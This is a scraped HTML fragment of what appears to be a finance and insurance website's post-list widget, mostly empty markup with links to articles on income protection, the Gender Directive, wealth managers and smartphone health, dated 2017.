</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									